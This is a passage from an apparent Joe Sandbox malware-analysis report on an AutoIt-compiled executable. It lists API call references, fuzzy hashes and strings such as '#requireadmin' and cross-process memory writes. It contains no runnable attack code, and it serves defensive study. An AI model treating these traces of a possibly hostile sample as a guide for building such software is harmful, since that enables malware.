        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _free$ErrorFreeHeapLast
        • String ID:
        • API String ID: 776569668-0
        • Opcode ID: ad2c034f456cd7e14fd5ed8ed62c894248e0f415bcda66164e4c906820ad4ecc
        • Instruction ID: a37196033110254f1d29410589381cfdfe8f7f53a1cdca02a5630c3bf5d7e048
        • Opcode Fuzzy Hash: ad2c034f456cd7e14fd5ed8ed62c894248e0f415bcda66164e4c906820ad4ecc
        • Instruction Fuzzy Hash: FAF0FF32564219EB8622EF68F9C9C96B7DDBB65720BB41805F048DB541CB24FCF18AA4
        APIs
        • GetDlgItem.USER32(?,000003E9), ref: 00245C58
        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00245C6F
        • MessageBeep.USER32(00000000), ref: 00245C87
        • KillTimer.USER32(?,0000040A), ref: 00245CA3
        • EndDialog.USER32(?,00000001), ref: 00245CBD
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: BeepDialogItemKillMessageTextTimerWindow
        • String ID:
        • API String ID: 3741023627-0
        • Opcode ID: ec7b004a82f830b801a33c9892b5826bf10d5e4aa4ac78972aad13f4dc10422a
        • Instruction ID: 34faf9437d32699df0d57ae830d2c34f3bbb32aa08987eed8df55e7bf52daba6
        • Opcode Fuzzy Hash: ec7b004a82f830b801a33c9892b5826bf10d5e4aa4ac78972aad13f4dc10422a
        • Instruction Fuzzy Hash: 26018630510B14ABEB355F20EDCEFA677BCBB40B05F00055EB587A10E1DBF4A9948B91
        APIs
        • _free.LIBCMT ref: 002122BE
          • Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?), ref: 002129DE
          • Part of subcall function 002129C8: GetLastError.KERNEL32(?,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?,?), ref: 002129F0
        • _free.LIBCMT ref: 002122D0
        • _free.LIBCMT ref: 002122E3
        • _free.LIBCMT ref: 002122F4
        • _free.LIBCMT ref: 00212305
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _free$ErrorFreeHeapLast
        • String ID:
        • API String ID: 776569668-0
        • Opcode ID: 58bc90f284c2919c72e29fe2d59ad56bef39f1c740576430b51dc93dcb6a31ea
        • Instruction ID: 7fde5623b8153792cee26a66782cbd7696cd25e81b4e0669b0529891526e091c
        • Opcode Fuzzy Hash: 58bc90f284c2919c72e29fe2d59ad56bef39f1c740576430b51dc93dcb6a31ea
        • Instruction Fuzzy Hash: 7DF05EB1920124CB8713AF58BC498AD3BE4F729760760170AF814DA3B1CF3448B5AFE4
        APIs
        • EndPath.GDI32(?), ref: 001F95D4
        • StrokeAndFillPath.GDI32(?,?,002371F7,00000000,?,?,?), ref: 001F95F0
        • SelectObject.GDI32(?,00000000), ref: 001F9603
        • DeleteObject.GDI32 ref: 001F9616
        • StrokePath.GDI32(?), ref: 001F9631
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Path$ObjectStroke$DeleteFillSelect
        • String ID:
        • API String ID: 2625713937-0
        • Opcode ID: 1ccc431c8358e648659500fd782beb2ad6247d6b7f06d16659b9d60ecf9f98b9
        • Instruction ID: 55df4e31dd317141d8ef5abb98aaeaff4c2b482a35f7efe0d4635237fe9d81a8
        • Opcode Fuzzy Hash: 1ccc431c8358e648659500fd782beb2ad6247d6b7f06d16659b9d60ecf9f98b9
        • Instruction Fuzzy Hash: BDF03C30006A88EBDB266F65FD2C7B43B65AB00332F648318F529950F0C73089A5DF60
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: __freea$_free
        • String ID: a/p$am/pm
        • API String ID: 3432400110-3206640213
        • Opcode ID: 9da6ac45968de7260d4faf376ea15ae288621218ff0e35ec8b2b7dce68d3dcb2
        • Instruction ID: f291e3cfc131d70b6e0794d2129651e452930ad01a02fb27236e1a843f13b689
        • Opcode Fuzzy Hash: 9da6ac45968de7260d4faf376ea15ae288621218ff0e35ec8b2b7dce68d3dcb2
        • Instruction Fuzzy Hash: 3FD1E0319302079ACB249F68C845BFAB7F1EF25300F280199EB159B658D3759DF0CB91
        APIs
          • Part of subcall function 00200242: EnterCriticalSection.KERNEL32(002B070C,002B1884,?,?,001F198B,002B2518,?,?,?,001E12F9,00000000), ref: 0020024D
          • Part of subcall function 00200242: LeaveCriticalSection.KERNEL32(002B070C,?,001F198B,002B2518,?,?,?,001E12F9,00000000), ref: 0020028A
          • Part of subcall function 002000A3: __onexit.LIBCMT ref: 002000A9
        • __Init_thread_footer.LIBCMT ref: 00266238
          • Part of subcall function 002001F8: EnterCriticalSection.KERNEL32(002B070C,?,?,001F8747,002B2514), ref: 00200202
          • Part of subcall function 002001F8: LeaveCriticalSection.KERNEL32(002B070C,?,001F8747,002B2514), ref: 00200235
          • Part of subcall function 0025359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002535E4
          • Part of subcall function 0025359C: LoadStringW.USER32(002B2390,?,00000FFF,?), ref: 0025360A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
        • String ID: x#+$x#+$x#+
        • API String ID: 1072379062-2040377914
        • Opcode ID: 612cfc21e960b35f60f38b5098a9b27af051c6570116f5d156efb9fa0154416c
        • Instruction ID: 56a6719798b0573b952b2cedc4984b480c957990e41c303874116b4bde95119b
        • Opcode Fuzzy Hash: 612cfc21e960b35f60f38b5098a9b27af051c6570116f5d156efb9fa0154416c
        • Instruction Fuzzy Hash: B1C1C371A1020AAFDB14DF58C895EBEB7B9FF58300F108059F9059B291DB70ED95CB90
        APIs
        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00218B6E
        • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00218B7A
        • __dosmaperr.LIBCMT ref: 00218B81
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ByteCharErrorLastMultiWide__dosmaperr
        • String ID: .
        • API String ID: 2434981716-2462612998
        • Opcode ID: 3cbcdfa879547951ce53d8d4374cb532962f512a93257f78f940f686b97a5507
        • Instruction ID: 2bd50f894f6b6a6d1f1f7a1072f8e21067c6df64a47fbd2cbbb99bea6a95a0a9
        • Opcode Fuzzy Hash: 3cbcdfa879547951ce53d8d4374cb532962f512a93257f78f940f686b97a5507
        • Instruction Fuzzy Hash: 05418C70628145AFDB259F24DCC4AF97FE5DFA6308B2841A9F889C7542DE318DA38790
        APIs
          • Part of subcall function 0024B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002421D0,?,?,00000034,00000800,?,00000034), ref: 0024B42D
        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00242760
          • Part of subcall function 0024B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002421FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0024B3F8
          • Part of subcall function 0024B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0024B355
          • Part of subcall function 0024B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00242194,00000034,?,?,00001004,00000000,00000000), ref: 0024B365
          • Part of subcall function 0024B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00242194,00000034,?,?,00001004,00000000,00000000), ref: 0024B37B
        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002427CD
        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0024281A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
        • String ID: @
        • API String ID: 4150878124-2766056989
        • Opcode ID: 669de2ad35457127ea00cd36cec4719b3614bfe0877732db75bb50cefc687a66
        • Instruction ID: a1793bdbeae9acc93e6e6f597acd436d84c55ca0c4d8ef4e9155fd54f0cee09a
        • Opcode Fuzzy Hash: 669de2ad35457127ea00cd36cec4719b3614bfe0877732db75bb50cefc687a66
        • Instruction Fuzzy Hash: 72413D72900218AFDB15DFA4CD85ADEBBB8AF05300F104099FA55B7181DB70AE99CF60
        APIs
        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 00211769
        • _free.LIBCMT ref: 00211834
        • _free.LIBCMT ref: 0021183E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _free$FileModuleName
        • String ID: C:\Users\user\Desktop\file.exe
        • API String ID: 2506810119-517116171
        • Opcode ID: 7c041c8724fadefa0adf119aca7e49c01e118af0adac7b11fb933b3d86c974d5
        • Instruction ID: e233df059d5b0e1de7f4f826224bb1effa4705445295077304c42793c9b04c59
        • Opcode Fuzzy Hash: 7c041c8724fadefa0adf119aca7e49c01e118af0adac7b11fb933b3d86c974d5
        • Instruction Fuzzy Hash: F831CE71A20218EFDB21DF999885DDEBBFCEBA5310B604166F90497251D7B08EB1CB90
        APIs
        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0024C306
        • DeleteMenu.USER32(?,00000007,00000000), ref: 0024C34C
        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002B1990,01055730), ref: 0024C395
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Menu$Delete$InfoItem
        • String ID: 0
        • API String ID: 135850232-4108050209
        • Opcode ID: 2e290b599ff9ca37905c89a5a32839313f55bf2659184798be0c5804b9f5b2db
        • Instruction ID: ff403d45fb17a28e307ba05eda793edf31cc5e959c1a16404a49bb18cdaa6cae
        • Opcode Fuzzy Hash: 2e290b599ff9ca37905c89a5a32839313f55bf2659184798be0c5804b9f5b2db
        • Instruction Fuzzy Hash: 9041E3312163029FD728DF29D884B1ABBE4AF85310F2086ADF9A5972D1D770E854CB62
        APIs
        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0027CC08,00000000,?,?,?,?), ref: 002744AA
        • GetWindowLongW.USER32 ref: 002744C7
        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002744D7
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$Long
        • String ID: SysTreeView32
        • API String ID: 847901565-1698111956
        • Opcode ID: b92fea825ed9cbb69a88383b715dfe86488a857e641d8b8ef599d8f34c5c53da
        • Instruction ID: ac4b2a6435104dffa5c387249a91039084f540e0a8450f1cba7c11f68277eea4
        • Opcode Fuzzy Hash: b92fea825ed9cbb69a88383b715dfe86488a857e641d8b8ef599d8f34c5c53da
        • Instruction Fuzzy Hash: 27317031220606AFDF21AE38DC45BEA77A9EB59334F608715F979921E0DB70EC609B50
        APIs
        • SysReAllocString.OLEAUT32(?,?), ref: 00246EED
        • VariantCopyInd.OLEAUT32(?,?), ref: 00246F08
        • VariantClear.OLEAUT32(?), ref: 00246F12
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Variant$AllocClearCopyString
        • String ID: *j$
        • API String ID: 2173805711-1770683864
        • Opcode ID: 2fd803801ef7018bc17f418910512b7a333233f1092910a026d0b4ceb6620d18
        • Instruction ID: 1411e9a93834289013dad6b678399741436386989ce979a119fe115801f33131
        • Opcode Fuzzy Hash: 2fd803801ef7018bc17f418910512b7a333233f1092910a026d0b4ceb6620d18
        • Instruction Fuzzy Hash: 5B31F671628645DFCB08AF64F8989BE37B6FF46300B210498F9834B6A1C7709D25DBD2
        APIs
          • Part of subcall function 0026335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00263077,?,?), ref: 00263378
        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0026307A
        • _wcslen.LIBCMT ref: 0026309B
        • htons.WSOCK32(00000000,?,?,00000000), ref: 00263106
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
        • String ID: 255.255.255.255
        • API String ID: 946324512-2422070025
        • Opcode ID: 78b79df701035071317136e225f5bddb31de660d75cf6c14c6016d81a398cda3
        • Instruction ID: d7b871ee39c8182542ebbd75c2ea19f10a0b17ad53ad3b186faddda334f78c3a
        • Opcode Fuzzy Hash: 78b79df701035071317136e225f5bddb31de660d75cf6c14c6016d81a398cda3
        • Instruction Fuzzy Hash: 6B31D535614206DFCB20CF28C585EA977E0EF55318F248099E9158B392DB72DED5CB61
        APIs
        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00274705
        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00274713
        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0027471A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend$DestroyWindow
        • String ID: msctls_updown32
        • API String ID: 4014797782-2298589950
        • Opcode ID: c03578c89cd67064adcb9f6fd6831a9a7304fa3fba9c7d8c5dfc02709e0c70a1
        • Instruction ID: a0ca39027813f40035e9234681d5c011742e6e786727007c11fedb4bcd099f19
        • Opcode Fuzzy Hash: c03578c89cd67064adcb9f6fd6831a9a7304fa3fba9c7d8c5dfc02709e0c70a1
        • Instruction Fuzzy Hash: 0B21A1B5610209AFDB14EF64ECD5DBB37ADEF9A394B504149FA049B251CB30EC61CB60
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _wcslen
        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
        • API String ID: 176396367-2734436370
        • Opcode ID: 896bc2094fcb9e49c7b2f74a55447332749577db5f5df7eafa5f54e0046aa904
        • Instruction ID: c04b5cb505f065d05f274196bf5a7c8a14b87a0e4f237f58939d14d52b3fe9ce
        • Opcode Fuzzy Hash: 896bc2094fcb9e49c7b2f74a55447332749577db5f5df7eafa5f54e0046aa904
        • Instruction Fuzzy Hash: 43218E3213461166D335BF24EC02FBB73DC9F65310F508025FA4997082EBA09DF1C291
        APIs
        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00273840
        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00273850
        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00273876
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend$MoveWindow
        • String ID: Listbox
        • API String ID: 3315199576-2633736733
        • Opcode ID: 8d7918a22de34d650365e7f87e534202d820c1181b7ce966652a407b5d17f785
        • Instruction ID: 77e0fe1346b97477dd458572ecf9b9dcb1d7d6dc5ff77a19ccb863e3a44a67e6
        • Opcode Fuzzy Hash: 8d7918a22de34d650365e7f87e534202d820c1181b7ce966652a407b5d17f785
        • Instruction Fuzzy Hash: 88219272620119BBEF15CF64DC85FBB776EEF89760F108114F9489B190CA71DC629BA0
        APIs
        • SetErrorMode.KERNEL32(00000001), ref: 00254A08
        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00254A5C
        • SetErrorMode.KERNEL32(00000000,?,?,0027CC08), ref: 00254AD0
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorMode$InformationVolume
        • String ID: %lu
        • API String ID: 2507767853-685833217
        • Opcode ID: ec3555dcab3f7f5b62cee090d377db5bc5f7bb1530915b75c754f883d04b009f
        • Instruction ID: 57829eb656b232aba7f9af12fed21a55b3cb3717557d3f0354b8ec0a9b1a16cb
        • Opcode Fuzzy Hash: ec3555dcab3f7f5b62cee090d377db5bc5f7bb1530915b75c754f883d04b009f
        • Instruction Fuzzy Hash: 71318575A00109AFDB10DF64C985EAEB7F8EF09308F1480A9F909DB252D771EE85CB61
        APIs
        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0027424F
        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00274264
        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00274271
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend
        • String ID: msctls_trackbar32
        • API String ID: 3850602802-1010561917
        • Opcode ID: 6c78aa44a2ca6a4ba80376836a5ae290b8961561c147ebd36a0b15e55dee2fcb
        • Instruction ID: 3166cbdc27700dda946521d1cf5dcae0193e2b088ba059bc2b9850ce974dec52
        • Opcode Fuzzy Hash: 6c78aa44a2ca6a4ba80376836a5ae290b8961561c147ebd36a0b15e55dee2fcb
        • Instruction Fuzzy Hash: B311E331250249BEEF216E29CC06FAB3BACEF95B54F114514FA59E2090D771DC719B14
        APIs
          • Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A
